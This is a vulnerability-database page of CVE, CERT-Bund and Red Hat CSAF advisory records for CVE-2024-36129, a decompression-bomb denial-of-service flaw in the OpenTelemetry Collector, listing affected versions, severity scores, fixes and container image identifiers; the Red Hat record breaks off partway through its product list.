Action not permitted
Modal body text goes here.
cve-2024-36129
Vulnerability from cvelistv5
▼ | Vendor | Product |
---|---|---|
open-telemetry | opentelemetry-collector |
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:opentelemetry:opentelemetry:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "opentelemetry", "vendor": "opentelemetry", "versions": [ { "lessThan": "0.102.1", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2024-36129", "options": [ { "Exploitation": "poc" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-07-19T12:31:23.085235Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-23T15:38:47.454Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T03:30:13.165Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "https://github.com/open-telemetry/opentelemetry-collector/security/advisories/GHSA-c74f-6mfw-mm4v", "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/open-telemetry/opentelemetry-collector/security/advisories/GHSA-c74f-6mfw-mm4v" }, { "name": "https://github.com/open-telemetry/opentelemetry-collector/pull/10289", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/open-telemetry/opentelemetry-collector/pull/10289" }, { "name": "https://github.com/open-telemetry/opentelemetry-collector/pull/10323", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/open-telemetry/opentelemetry-collector/pull/10323" }, { "name": "https://opentelemetry.io/blog/2024/cve-2024-36129", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://opentelemetry.io/blog/2024/cve-2024-36129" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "opentelemetry-collector", "vendor": "open-telemetry", "versions": [ { "status": "affected", "version": "\u003c 0.102.1" } ] } ], "descriptions": [ { "lang": "en", "value": "The OpenTelemetry Collector offers a vendor-agnostic implementation on how to receive, process and export telemetry data. An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption. OTel Collector version 0.102.1 fixes this issue. It is also fixed in the confighttp module version 0.102.0 and configgrpc module version 0.102.1.\n" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-05T17:26:13.903Z", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "https://github.com/open-telemetry/opentelemetry-collector/security/advisories/GHSA-c74f-6mfw-mm4v", "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/open-telemetry/opentelemetry-collector/security/advisories/GHSA-c74f-6mfw-mm4v" }, { "name": "https://github.com/open-telemetry/opentelemetry-collector/pull/10289", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/open-telemetry/opentelemetry-collector/pull/10289" }, { "name": "https://github.com/open-telemetry/opentelemetry-collector/pull/10323", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/open-telemetry/opentelemetry-collector/pull/10323" }, { "name": "https://opentelemetry.io/blog/2024/cve-2024-36129", "tags": [ "x_refsource_MISC" ], "url": "https://opentelemetry.io/blog/2024/cve-2024-36129" } ], "source": { "advisory": "GHSA-c74f-6mfw-mm4v", "discovery": "UNKNOWN" }, "title": "OpenTelemetry Collector has a Denial of Service via Zip/Decompression Bomb sent over HTTP or gRPC" } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2024-36129", "datePublished": "2024-06-05T17:26:13.903Z", "dateReserved": "2024-05-20T21:07:48.190Z", "dateUpdated": "2024-08-02T03:30:13.165Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2024-36129\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-06-05T18:15:10.833\",\"lastModified\":\"2024-06-18T17:34:11.873\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The OpenTelemetry Collector offers a vendor-agnostic implementation on how to receive, process and export telemetry data. An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption. OTel Collector version 0.102.1 fixes this issue. It is also fixed in the confighttp module version 0.102.0 and configgrpc module version 0.102.1.\\n\"},{\"lang\":\"es\",\"value\":\"OpenTelemetry Collector ofrece una implementaci\u00f3n independiente del proveedor sobre c\u00f3mo recibir, procesar y exportar datos de telemetr\u00eda. Una vulnerabilidad de descompresi\u00f3n insegura permite a atacantes no autenticados bloquear el recopilador mediante un consumo excesivo de memoria. La versi\u00f3n 0.102.1 de OTel Collector soluciona este problema. Tambi\u00e9n est\u00e1 corregido en la versi\u00f3n 0.102.0 del m\u00f3dulo confighttp y en la versi\u00f3n 0.102.1 del m\u00f3dulo configgrpc.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\",\"baseScore\":8.2,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-119\"}]},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-119\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:opentelemetry:configgrpc:*:*:*:*:*:go:*:*\",\"versionEndExcluding\":\"0.102.1\",\"matchCriteriaId\":\"327CE873-41EC-401C-AF22-0A179C4A37D0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:opentelemetry:confighttp:*:*:*:*:*:go:*:*\",\"versionEndExcluding\":\"0.102.0\",\"matchCriteriaId\":\"13F55EF7-B8F7-4344-BE0C-C8129E57A306\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:opentelemetry:opentelemetry_collector:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.102.1\",\"matchCriteriaId\":\"8F3C518A-75AF-4A34-83DF-9FCB346FE5EF\"}]}]}],\"references\":[{\"url\":\"https://github.com/open-telemetry/opentelemetry-collector/pull/10289\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/open-telemetry/opentelemetry-collector/pull/10323\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/open-telemetry/opentelemetry-collector/security/advisories/GHSA-c74f-6mfw-mm4v\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://opentelemetry.io/blog/2024/cve-2024-36129\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]}]}}" } }
wid-sec-w-2024-1392
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Red Hat OpenShift ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.", "title": "Angriff" }, { "category": "general", "text": "- Linux", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2024-1392 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1392.json" }, { "category": "self", "summary": "WID-SEC-2024-1392 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1392" }, { "category": "external", "summary": "RedHat Security Advisory vom 2024-06-16", "url": "https://access.redhat.com/errata/RHSA-2024:3943" }, { "category": "external", "summary": "Amazon Linux Security Advisory ALAS-2024-2630 vom 2024-09-05", "url": "https://alas.aws.amazon.com/AL2/ALAS-2024-2630.html" } ], "source_lang": "en-US", "title": "Red Hat OpenShift: Schwachstelle erm\u00f6glicht Denial of Service", "tracking": { "current_release_date": "2024-09-05T22:00:00.000+00:00", "generator": { "date": "2024-09-06T08:14:00.876+00:00", "engine": { "name": "BSI-WID", "version": "1.3.6" } }, "id": "WID-SEC-W-2024-1392", "initial_release_date": "2024-06-16T22:00:00.000+00:00", "revision_history": [ { "date": "2024-06-16T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2024-09-05T22:00:00.000+00:00", "number": "2", "summary": "Neue Updates von Amazon aufgenommen" } ], "status": "final", "version": "2" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_name", "name": "Amazon Linux 2", "product": { "name": "Amazon Linux 2", "product_id": "398363", "product_identification_helper": { "cpe": "cpe:/o:amazon:linux_2:-" } } } ], "category": "vendor", "name": "Amazon" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "\u003c3.2.1", "product": { "name": "Red Hat OpenShift \u003c3.2.1", "product_id": "T035494" } }, { "category": "product_version", "name": "3.2.1", "product": { "name": "Red Hat OpenShift 3.2.1", "product_id": "T035494-fixed", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:3.2.1" } } } ], "category": "product_name", "name": "OpenShift" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-36129", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle in Red Hat OpenShift. Dieser Fehler besteht in der Komponente OpenTelemetry Collector aufgrund einer unsachgem\u00e4\u00dfen Eingabevalidierung bei der Verarbeitung komprimierter Nutzdaten. Durch eine speziell gestaltete HTTP- oder gRPC-Anfrage kann ein entfernter, anonymer Angreifer diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu verursachen." } ], "product_status": { "known_affected": [ "398363", "T035494" ] }, "release_date": "2024-06-16T22:00:00.000+00:00", "title": "CVE-2024-36129" } ] }
wid-sec-w-2024-1680
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "IBM App Connect Enterprise kombiniert die branchenbew\u00e4hrten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in IBM App Connect Enterprise ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.", "title": "Angriff" }, { "category": "general", "text": "- Linux", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2024-1680 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1680.json" }, { "category": "self", "summary": "WID-SEC-2024-1680 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1680" }, { "category": "external", "summary": "IBM Security Bulletin vom 2024-07-18", "url": "https://www.ibm.com/support/pages/node/7160715" } ], "source_lang": "en-US", "title": "IBM App Connect Enterprise: Schwachstelle erm\u00f6glicht Denial of Service", "tracking": { "current_release_date": "2024-07-18T22:00:00.000+00:00", "generator": { "date": "2024-08-15T18:11:37.426+00:00", "engine": { "name": "BSI-WID", "version": "1.3.5" } }, "id": "WID-SEC-W-2024-1680", "initial_release_date": "2024-07-18T22:00:00.000+00:00", "revision_history": [ { "date": "2024-07-18T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "Container Operator \u003c5.0.19", "product": { "name": "IBM App Connect Enterprise Container Operator \u003c5.0.19", "product_id": "T036375" } }, { "category": "product_version_range", "name": "\u003c12.0.12.3-r1-lts", "product": { "name": "IBM App Connect Enterprise \u003c12.0.12.3-r1-lts", "product_id": "T036376" } } ], "category": "product_name", "name": "App Connect Enterprise" } ], "category": "vendor", "name": "IBM" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-36129", "notes": [ { "category": "description", "text": "Es besteht eine Schwachstelle im OpenTelemetry Collector in IBM App Connect Enterprise, die auf eine unsichere Dekomprimierung zur\u00fcckzuf\u00fchren ist. Durch das Senden einer Zip-Bombe oder Dekompressionsbombe mit einem speziell gestalteten HTTP oder gRPC Request kann ein entfernter, anonymer Angreifer diese Schwachstelle ausnutzen, um einen Denial-of-Service-Zustand zu verursachen." } ], "release_date": "2024-07-18T22:00:00.000+00:00", "title": "CVE-2024-36129" } ] }
rhsa-2024_3943
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important" }, "category": "csaf_vex", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift distributed tracing 3.2.1\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Release of Red Hat OpenShift distributed tracing provides these changes:\n\nSecurity Fix(es):\n\n* opentelemetry-collector: denial of service via specially crafted HTTP or gRPC request (CVE-2024-36129)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat offerings.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2024:3943", "url": "https://access.redhat.com/errata/RHSA-2024:3943" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important" }, { "category": "external", "summary": "2291337", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2291337" }, { "category": "external", "summary": "TRACING-4344", "url": "https://issues.redhat.com/browse/TRACING-4344" }, { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3943.json" } ], "title": "Red Hat Security Advisory: Red Hat OpenShift distributed tracing 3.2.1 operator containers security update", "tracking": { "current_release_date": "2024-09-16T19:42:30+00:00", "generator": { "date": "2024-09-16T19:42:30+00:00", "engine": { "name": "Red Hat SDEngine", "version": "3.33.3" } }, "id": "RHSA-2024:3943", "initial_release_date": "2024-06-17T09:24:22+00:00", "revision_history": [ { "date": "2024-06-17T09:24:22+00:00", "number": "1", "summary": "Initial version" }, { "date": "2024-06-17T09:24:22+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-09-16T19:42:30+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift distributed tracing 3.2", "product": { "name": "Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_distributed_tracing:3.2::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift distributed tracing" }, { "branches": [ { "category": "product_version", "name": "rhosdt/jaeger-agent-rhel8@sha256:fb5aa41f94b0a86abf523c72766ceb65df38c3db9ff38353719d6de0035ffbdc_arm64", "product": { "name": "rhosdt/jaeger-agent-rhel8@sha256:fb5aa41f94b0a86abf523c72766ceb65df38c3db9ff38353719d6de0035ffbdc_arm64", "product_id": "rhosdt/jaeger-agent-rhel8@sha256:fb5aa41f94b0a86abf523c72766ceb65df38c3db9ff38353719d6de0035ffbdc_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256:fb5aa41f94b0a86abf523c72766ceb65df38c3db9ff38353719d6de0035ffbdc?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-agent-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:a1831d0a89dd43cc3ff609c668ba56e6ef1c9aa0b4e2415d77e8b669eb22dfac_arm64", "product": { "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:a1831d0a89dd43cc3ff609c668ba56e6ef1c9aa0b4e2415d77e8b669eb22dfac_arm64", "product_id": "rhosdt/jaeger-all-in-one-rhel8@sha256:a1831d0a89dd43cc3ff609c668ba56e6ef1c9aa0b4e2415d77e8b669eb22dfac_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256:a1831d0a89dd43cc3ff609c668ba56e6ef1c9aa0b4e2415d77e8b669eb22dfac?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-collector-rhel8@sha256:16a6dca76a733d75d6e3de4db552890905e0106eae66a6e9ae4031eb5bb2e357_arm64", "product": { "name": "rhosdt/jaeger-collector-rhel8@sha256:16a6dca76a733d75d6e3de4db552890905e0106eae66a6e9ae4031eb5bb2e357_arm64", "product_id": "rhosdt/jaeger-collector-rhel8@sha256:16a6dca76a733d75d6e3de4db552890905e0106eae66a6e9ae4031eb5bb2e357_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256:16a6dca76a733d75d6e3de4db552890905e0106eae66a6e9ae4031eb5bb2e357?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-collector-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c8879a96b034635bde298cc86f4b3d6192a39dc7906bea49865c779ae4369426_arm64", "product": { "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c8879a96b034635bde298cc86f4b3d6192a39dc7906bea49865c779ae4369426_arm64", "product_id": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c8879a96b034635bde298cc86f4b3d6192a39dc7906bea49865c779ae4369426_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256:c8879a96b034635bde298cc86f4b3d6192a39dc7906bea49865c779ae4369426?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8\u0026tag=1.57.0-7" } } }, { "category": "product_version", "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:7932a2d60ada2a669b2ad4f5d3f0c956cdb4aca1cfd8116963211668cf324f95_arm64", "product": { "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:7932a2d60ada2a669b2ad4f5d3f0c956cdb4aca1cfd8116963211668cf324f95_arm64", "product_id": "rhosdt/jaeger-es-rollover-rhel8@sha256:7932a2d60ada2a669b2ad4f5d3f0c956cdb4aca1cfd8116963211668cf324f95_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256:7932a2d60ada2a669b2ad4f5d3f0c956cdb4aca1cfd8116963211668cf324f95?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8\u0026tag=1.57.0-7" } } }, { "category": "product_version", "name": "rhosdt/jaeger-ingester-rhel8@sha256:794104cf40a505d0244ac3c2d23d19785d29b1fca882d0354fd129320abf093c_arm64", "product": { "name": "rhosdt/jaeger-ingester-rhel8@sha256:794104cf40a505d0244ac3c2d23d19785d29b1fca882d0354fd129320abf093c_arm64", "product_id": "rhosdt/jaeger-ingester-rhel8@sha256:794104cf40a505d0244ac3c2d23d19785d29b1fca882d0354fd129320abf093c_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256:794104cf40a505d0244ac3c2d23d19785d29b1fca882d0354fd129320abf093c?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-ingester-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-operator-bundle@sha256:ee9e1acac032d61486a76d4d36183f5dac1e3e9c826016930a1ad4ed59f4cee7_arm64", "product": { "name": "rhosdt/jaeger-operator-bundle@sha256:ee9e1acac032d61486a76d4d36183f5dac1e3e9c826016930a1ad4ed59f4cee7_arm64", "product_id": "rhosdt/jaeger-operator-bundle@sha256:ee9e1acac032d61486a76d4d36183f5dac1e3e9c826016930a1ad4ed59f4cee7_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-operator-bundle@sha256:ee9e1acac032d61486a76d4d36183f5dac1e3e9c826016930a1ad4ed59f4cee7?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-operator-bundle\u0026tag=1.57.0-26" } } }, { "category": "product_version", "name": "rhosdt/jaeger-rhel8-operator@sha256:4b01965dc2786373d46e43773453c3fa182592621d06f6e6d9001b8e53b6b844_arm64", "product": { "name": "rhosdt/jaeger-rhel8-operator@sha256:4b01965dc2786373d46e43773453c3fa182592621d06f6e6d9001b8e53b6b844_arm64", "product_id": "rhosdt/jaeger-rhel8-operator@sha256:4b01965dc2786373d46e43773453c3fa182592621d06f6e6d9001b8e53b6b844_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256:4b01965dc2786373d46e43773453c3fa182592621d06f6e6d9001b8e53b6b844?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-rhel8-operator\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-query-rhel8@sha256:c7bf1f061c319d8ff3701dfa756d33d63a01496ba6526363177c6746f508c4c6_arm64", "product": { "name": "rhosdt/jaeger-query-rhel8@sha256:c7bf1f061c319d8ff3701dfa756d33d63a01496ba6526363177c6746f508c4c6_arm64", "product_id": "rhosdt/jaeger-query-rhel8@sha256:c7bf1f061c319d8ff3701dfa756d33d63a01496ba6526363177c6746f508c4c6_arm64", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256:c7bf1f061c319d8ff3701dfa756d33d63a01496ba6526363177c6746f508c4c6?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-query-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949_arm64", "product": { "name": "rhosdt/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949_arm64", "product_id": "rhosdt/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949_arm64", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-collector-rhel8\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-operator-bundle@sha256:c90e55c89cbd1e696c4d1a42d67a0a14d2e43fb99de00acac2d57bf69c1dfbdb_arm64", "product": { "name": "rhosdt/opentelemetry-operator-bundle@sha256:c90e55c89cbd1e696c4d1a42d67a0a14d2e43fb99de00acac2d57bf69c1dfbdb_arm64", "product_id": "rhosdt/opentelemetry-operator-bundle@sha256:c90e55c89cbd1e696c4d1a42d67a0a14d2e43fb99de00acac2d57bf69c1dfbdb_arm64", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-operator-bundle@sha256:c90e55c89cbd1e696c4d1a42d67a0a14d2e43fb99de00acac2d57bf69c1dfbdb?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-operator-bundle\u0026tag=0.102.0-5" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-rhel8-operator@sha256:2780f2fff1be43eddccac091ffb55056121059739a98d0255f1459923cdccf23_arm64", "product": { "name": "rhosdt/opentelemetry-rhel8-operator@sha256:2780f2fff1be43eddccac091ffb55056121059739a98d0255f1459923cdccf23_arm64", "product_id": "rhosdt/opentelemetry-rhel8-operator@sha256:2780f2fff1be43eddccac091ffb55056121059739a98d0255f1459923cdccf23_arm64", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-rhel8-operator@sha256:2780f2fff1be43eddccac091ffb55056121059739a98d0255f1459923cdccf23?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-rhel8-operator\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:9944e14192b97132915df21fe46bf29f77560aee35f142c8e51bbf8119f778de_arm64", "product": { "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:9944e14192b97132915df21fe46bf29f77560aee35f142c8e51bbf8119f778de_arm64", "product_id": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:9944e14192b97132915df21fe46bf29f77560aee35f142c8e51bbf8119f778de_arm64", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-target-allocator-rhel8@sha256:9944e14192b97132915df21fe46bf29f77560aee35f142c8e51bbf8119f778de?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-target-allocator-rhel8\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/tempo-rhel8@sha256:396c6fcef9a4ab2627181359746ed68edf20d92f367c96a5f717cfe6517bd203_arm64", "product": { "name": "rhosdt/tempo-rhel8@sha256:396c6fcef9a4ab2627181359746ed68edf20d92f367c96a5f717cfe6517bd203_arm64", "product_id": "rhosdt/tempo-rhel8@sha256:396c6fcef9a4ab2627181359746ed68edf20d92f367c96a5f717cfe6517bd203_arm64", "product_identification_helper": { "purl": "pkg:oci/tempo-rhel8@sha256:396c6fcef9a4ab2627181359746ed68edf20d92f367c96a5f717cfe6517bd203?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/tempo-rhel8\u0026tag=2.4.2-4" } } }, { "category": "product_version", "name": "rhosdt/tempo-gateway-rhel8@sha256:9518da59837ff3b7472cfaccfd6664672e3a053a227f119a051cda0570c9e653_arm64", "product": { "name": 